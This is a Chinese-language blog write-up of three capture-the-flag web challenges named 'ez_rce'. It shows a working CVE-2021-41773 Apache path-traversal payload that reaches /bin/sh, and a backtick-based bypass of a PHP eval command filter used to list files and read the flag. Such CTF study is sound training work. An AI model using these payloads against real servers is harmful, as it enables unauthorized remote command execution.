[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce

第一题:[SWPUCTF 2022 新生赛]ez_rce已解决

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第1张图片

 1、看一下,啥也没有,找一下robots.txt

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第2张图片

2、访问一下,/NSS/index.php

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第3张图片

3、thinkphp,直接找个工具嗦吧,咱也不会

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第4张图片

4、粘过来直接用,后面写命令,这题很烦,我在/flag找了半天,没找到

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第5张图片

 5、后来发现了nss,又套娃,整的我这个菜鸡都怀疑人生了,太菜了!

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第6张图片

第二题:[NSSRound#4 SWPU]ez_rce

题目标签:CVE-2021-41773,版本漏洞

大佬详细解释:CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现_wavesky111的博客-CSDN博客_cve-2021-41773

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

burp中再写入命令,在flag_is_here中藏的很深,所以过滤一下

grep -r "NSS"  /flag_is_here
以递归的方式查找“/flag_is_here”下包含“NSS”的文件

grep详细用法:Linux grep 命令 | 菜鸟教程

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第7张图片

第三题、[UUCTF 2022 新生赛]ez_rce

居然都不输入参数,可恶!!!!!!!!!

';
        eval($code);
    }
    else{
        die("你想干什么?????????");
    }
}
else{
    echo "居然都不输入参数,可恶!!!!!!!!!";
    show_source(__FILE__);
}

过滤了很多命令函数,没有过滤反引号

?code=printf(`l\s /`);

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第8张图片

再查看flag就可以了

?code=printf(`c\at /fffffffffflagafag`);

 [SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce_第9张图片

 

你可能感兴趣的:(安全,web安全)